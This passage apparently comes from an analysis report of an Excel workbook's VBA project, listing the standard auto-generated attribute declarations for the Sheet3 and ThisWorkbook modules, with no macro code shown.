                                    7

                                    Attribute VB_TemplateDerived = False

                                    8

                                    Attribute VB_Customizable = True

                                    Module: Sheet3

                                    Declaration
                                    LineContent
                                    1

                                    Attribute VB_Name = "Sheet3"

                                    2

                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                    3

                                    Attribute VB_GlobalNameSpace = False

                                    4

                                    Attribute VB_Creatable = False

                                    5

                                    Attribute VB_PredeclaredId = True

                                    6

                                    Attribute VB_Exposed = True

                                    7

                                    Attribute VB_TemplateDerived = False

                                    8

                                    Attribute VB_Customizable = True

                                    Module: ThisWorkbook

                                    Declaration
                                    LineContent
                                    1

                                    Attribute VB_Name = "ThisWorkbook"

                                    2

                                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                    3

                                    Attribute VB_GlobalNameSpace = False

                                    4

                                    Attribute VB_Creatable = False

                                    5

                                    Attribute VB_PredeclaredId = True

                                    6

                                    Attribute VB_Exposed = True

                                    7

                                    Attribute VB_TemplateDerived = False

                                    8

                                    Attribute VB_Customizable = True